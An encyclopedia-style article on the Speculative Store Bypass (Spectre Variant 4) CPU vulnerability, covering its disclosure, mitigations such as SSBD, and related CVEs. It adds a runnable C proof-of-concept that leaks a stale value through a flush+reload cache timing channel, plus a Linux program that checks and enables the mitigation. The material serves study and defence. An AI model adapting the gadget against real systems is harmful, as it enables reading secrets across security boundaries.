Speculative Store Bypass

Speculative Store Bypass (SSB) (CVE-2018-3639) is the name given to a hardware security vulnerability, and the technique that exploits it, which takes advantage of speculative execution in a similar way to the Meltdown and Spectre security vulnerabilities.[1] It affects processor families from ARM, AMD and Intel. It was discovered by researchers at the Microsoft Security Response Center and Google Project Zero (GPZ).[2] After being leaked on 3 May 2018 as one of a group of eight additional Spectre-class flaws provisionally named Spectre-NG,[3][4][5][6] it was first disclosed to the public as "Variant 4" on 21 May 2018, alongside a related speculative execution vulnerability designated "Variant 3a".[7][1]

Details

Speculative execution exploit Variant 4[8] is referred to as Speculative Store Bypass (SSB)[1][9] and has been assigned CVE-2018-3639.[7] Although it is named Variant 4, it is the fifth variant in the Spectre-Meltdown class of vulnerabilities, since Variant 3a was disclosed with it.[7]

Steps involved in the exploit:[1]

  1. "Slowly" store a value to a memory location, so that the store's target address is not resolved until late (for example because the address itself depends on a load that misses the cache)
  2. "Quickly" load from that same memory location; the processor's memory disambiguation logic predicts that the load does not depend on the still-pending store, executes it speculatively, and returns the stale value that was previously at that location
  3. Use the value just read to disturb the cache in a measurable way (for example by loading from an array indexed by that value), so that the stale value can be recovered with a cache timing side channel after the misspeculation is squashed
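The three steps above as a runnable gadget, written as an added example for this page rather than taken from any published proof of concept. It assumes an x86 processor with the rdtscp and clflush instructions (a portable fallback compiles elsewhere but cannot observe the cache), a cache-hit threshold of 120 cycles chosen for illustration, and a store whose address depends on a pointer that was just evicted from the cache. The function names, the byte values 0x41/0x42 and the 1% detection cut-off are this example's own choices. Whether a stale value is actually observed depends on the CPU and on whether SSBD is enabled; the architectural result of the load is always the new value.

```c
/* Added example: a minimal Speculative Store Bypass (Variant 4) gadget with a
 * flush+reload read-out. Whether it leaks depends on the CPU and on SSBD being
 * off; the architectural value after the store is always NEW_VALUE. */
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static inline void flush(const volatile void *p) { _mm_clflush((const void *)p); }
static inline void fence(void) { _mm_mfence(); _mm_lfence(); }
static inline uint64_t cycles(void) { unsigned aux; return __rdtscp(&aux); }
#else
/* Portable fallback (assumption): compiles everywhere but cannot time the cache. */
static inline void flush(const volatile void *p) { (void)p; }
static inline void fence(void) {}
static inline uint64_t cycles(void) { return 0; }
#endif

#define STRIDE    4096   /* one page per probe line, so lines do not share prefetch streams */
#define OLD_VALUE 0x41   /* constructed: what is in memory before the store */
#define NEW_VALUE 0x42   /* constructed: what the "slow" store writes */
#define THRESHOLD 120    /* cycles; an access faster than this counts as a cache hit */

static volatile uint8_t probe[256 * STRIDE];
static volatile uint8_t storage[64] = { OLD_VALUE };
/* The store goes through this pointer. Its cache line is flushed before use, so the
 * store's address resolves late while the load's address (storage) is known at once. */
static uint8_t *volatile slow_ptr = (uint8_t *)storage;

/* One trial of the three steps. Returns the architectural value of storage[0]
 * after the store (always NEW_VALUE); any leak of OLD_VALUE lives in the cache. */
int ssb_trial(void)
{
    for (int i = 0; i < 256; i++) flush(&probe[i * STRIDE]);
    flush(&slow_ptr);
    fence();
    volatile uint8_t *p = slow_ptr;  /* cache miss: the store's address arrives late   */
    *p = NEW_VALUE;                  /* step 1: "slow" store                            */
    uint8_t v = storage[0];          /* step 2: "quick" load, may speculatively see OLD  */
    (void)probe[v * STRIDE];         /* step 3: leave a cache footprint indexed by v    */
    fence();
    int arch = storage[0];           /* the committed result: always NEW_VALUE           */
    storage[0] = OLD_VALUE;          /* reset for the next trial                         */
    return arch;
}

/* Flush+reload probe: time every line and count the ones that were cached. */
static void count_hits(unsigned hits[256])
{
    for (int i = 0; i < 256; i++) {
        int idx = (i * 167 + 13) & 255;  /* visit in a scrambled order to defeat the prefetcher */
        volatile uint8_t *line = &probe[idx * STRIDE];
        fence();
        uint64_t t0 = cycles();
        (void)*line;
        uint64_t t1 = cycles();
        if (t1 - t0 < THRESHOLD) hits[idx]++;
    }
}

/* The NEW_VALUE line is always cached by the architectural path, so the leak signal
 * is the OLD_VALUE line: report a bypass if it was cached in more than 1% of trials. */
int leak_detected(const unsigned hits[256], int trials)
{
    return hits[OLD_VALUE] * 100u > (unsigned)trials;
}

int main(void)
{
    unsigned hits[256] = { 0 };
    const int trials = 10000;
    for (int t = 0; t < trials; t++) {
        if (ssb_trial() != NEW_VALUE) { puts("architectural result wrong?!"); return 1; }
        count_hits(hits);
    }
    printf("probe line for old 0x%02x cached %u/%d times, for new 0x%02x %u/%d times\n",
           OLD_VALUE, hits[OLD_VALUE], trials, NEW_VALUE, hits[NEW_VALUE], trials);
    puts(leak_detected(hits, trials)
         ? "stale value observed via the cache: the load bypassed the older store"
         : "no bypass observed (SSBD on, fallback build, or no misprediction on this CPU)");
    return 0;
}
```

Build with optimisation enabled (for example gcc -O2) so that the volatile accesses are the only memory traffic in the gadget; on a machine where the mitigation is active the old-value line should stay at or near zero hits.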

Impact and mitigation

Intel claims that web browsers that are already patched to mitigate Spectre Variants 1 and 2 are partially protected against Variant 4.[7] Intel said in a statement that the likelihood of end users being affected was "low" and that not all protections would be on by default due to some impact on performance.[10] The Chrome JavaScript team confirmed that effective mitigation of Variant 4 in software is infeasible, in part due to performance impact.[11]

Intel planned to address Variant 4 with a microcode update that exposes a new control bit, Speculative Store Bypass Disable (SSBD), which software can set to stop loads from speculatively bypassing older stores.[7][2][12] At the time of writing, a stable microcode patch was yet to be delivered, with Intel suggesting that it would be ready "in the coming weeks".[needs update][7] Many operating system vendors are releasing software updates to assist with mitigating Variant 4;[13][2][14] however, because the operating system can only set SSBD if the microcode or firmware provides it, microcode/firmware updates are required for the software updates to have an effect.[13]
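How an administrator or developer can check whether SSBD is in effect and opt a process into it, as an added example that is not from this page or from any vendor's code. It relies on two Linux kernel interfaces: the sysfs file /sys/devices/system/cpu/vulnerabilities/spec_store_bypass, whose first word is "Not affected", "Vulnerable" or "Mitigation:", and the prctl(2) options PR_GET_SPECULATION_CTRL / PR_SET_SPECULATION_CTRL with PR_SPEC_STORE_BYPASS (Linux 4.17 and later). The constant values are repeated from linux/prctl.h for older headers; the function names and the state enum are this example's own. On a non-Linux host only the parsing helpers do anything.

```c
/* Added example: query and set the Speculative Store Bypass mitigation state on
 * Linux through sysfs and prctl(PR_*_SPECULATION_CTRL). */
#include <stdio.h>
#include <string.h>
#include <errno.h>
#ifdef __linux__
#include <sys/prctl.h>
#endif

/* Values from linux/prctl.h (Linux 4.17+), supplied here in case the build
 * host's headers predate them. */
#ifndef PR_GET_SPECULATION_CTRL
#define PR_GET_SPECULATION_CTRL 52
#define PR_SET_SPECULATION_CTRL 53
#endif
#ifndef PR_SPEC_STORE_BYPASS
#define PR_SPEC_STORE_BYPASS   0
#define PR_SPEC_NOT_AFFECTED   0
#define PR_SPEC_PRCTL          (1UL << 0)
#define PR_SPEC_ENABLE         (1UL << 1)
#define PR_SPEC_DISABLE        (1UL << 2)
#define PR_SPEC_FORCE_DISABLE  (1UL << 3)
#endif

enum ssb_state { SSB_UNKNOWN, SSB_NOT_AFFECTED, SSB_VULNERABLE, SSB_MITIGATED };

/* Classify the first line of /sys/devices/system/cpu/vulnerabilities/spec_store_bypass. */
enum ssb_state classify_sysfs(const char *line)
{
    if (strncmp(line, "Not affected", 12) == 0) return SSB_NOT_AFFECTED;
    if (strncmp(line, "Vulnerable", 10) == 0)   return SSB_VULNERABLE;
    if (strncmp(line, "Mitigation:", 11) == 0)  return SSB_MITIGATED;
    return SSB_UNKNOWN;
}

/* Decode the result of prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS).
 * PR_SPEC_DISABLE means speculation is disabled, i.e. the mitigation (SSBD) is on;
 * PR_SPEC_PRCTL means the calling task may change its own setting. */
const char *describe_prctl(long v)
{
    if (v < 0)                      return "prctl speculation control unsupported";
    if (v == PR_SPEC_NOT_AFFECTED)  return "not affected";
    if (v & PR_SPEC_FORCE_DISABLE)  return "SSBD on, forced (cannot be re-enabled)";
    if (v & PR_SPEC_DISABLE)
        return (v & PR_SPEC_PRCTL) ? "SSBD on, per-task control available"
                                   : "SSBD on, system-wide";
    if (v & PR_SPEC_ENABLE)
        return (v & PR_SPEC_PRCTL) ? "SSBD off, per-task control available"
                                   : "SSBD off, system-wide";
    return "unknown state";
}

/* Current SSB setting for the calling task, or -1 where the interface is absent. */
long query_prctl(void)
{
#ifdef __linux__
    return prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS, 0, 0, 0);
#else
    return -1;
#endif
}

/* Opt the calling process into SSBD. Returns 0 on success, otherwise errno
 * (ENXIO when the kernel does not allow per-task control). */
int enable_ssbd_for_self(void)
{
#ifdef __linux__
    if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS, PR_SPEC_DISABLE, 0, 0) == 0)
        return 0;
    return errno;
#else
    return ENOSYS;
#endif
}

int main(void)
{
    char line[256] = "";
    FILE *f = fopen("/sys/devices/system/cpu/vulnerabilities/spec_store_bypass", "r");
    if (f && fgets(line, sizeof line, f)) {
        line[strcspn(line, "\n")] = '\0';
        printf("sysfs : %s (state %d)\n", line, (int)classify_sysfs(line));
    } else {
        puts("sysfs : spec_store_bypass entry not available on this host");
    }
    if (f) fclose(f);

    long v = query_prctl();
    printf("prctl : %s\n", describe_prctl(v));
    /* Only try to opt in where the kernel says we may and it is not already on. */
    if (v >= 0 && (v & PR_SPEC_PRCTL) && !(v & PR_SPEC_DISABLE)) {
        int rc = enable_ssbd_for_self();
        printf("enable SSBD for this process: %s\n", rc ? strerror(rc) : "ok");
        printf("prctl now: %s\n", describe_prctl(query_prctl()));
    }
    return 0;
}
```

The opt-in only works when the kernel was booted with the default spec_store_bypass_disable=prctl (or =seccomp) policy; with =on the bit is already set for every task, and with =off the prctl fails with ENXIO, which the program reports rather than hides.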

Speculative execution exploit variants

Summary of speculative execution variants[15][7][16][17]

Vulnerability   CVE            Exploit name   Public vulnerability name              CVSS v2.0   CVSS v3.0
Spectre         CVE-2017-5753  Variant 1      Bounds Check Bypass (BCB)              4.7         5.6
Spectre         CVE-2017-5715  Variant 2      Branch Target Injection (BTI)          4.7         5.6
Meltdown        CVE-2017-5754  Variant 3      Rogue Data Cache Load (RDCL)           4.7         5.6
Spectre-NG      CVE-2018-3640  Variant 3a     Rogue System Register Read (RSRR[18])  4.7         5.6
Spectre-NG      CVE-2018-3639  Variant 4      Speculative Store Bypass (SSB)         4.9         5.5
Spectre-NG      CVE-2018-3665                 Lazy FP State Restore                  4.7         5.6
Spectre-NG      CVE-2018-3693                 Bounds Check Bypass Store (BCBS)       4.7         5.6
Foreshadow      CVE-2018-3615  Variant 5      L1 Terminal Fault (L1TF)               5.4         6.4
Foreshadow-NG   CVE-2018-3620                                                        4.7         5.6
Foreshadow-NG   CVE-2018-3646                                                        4.7         5.6
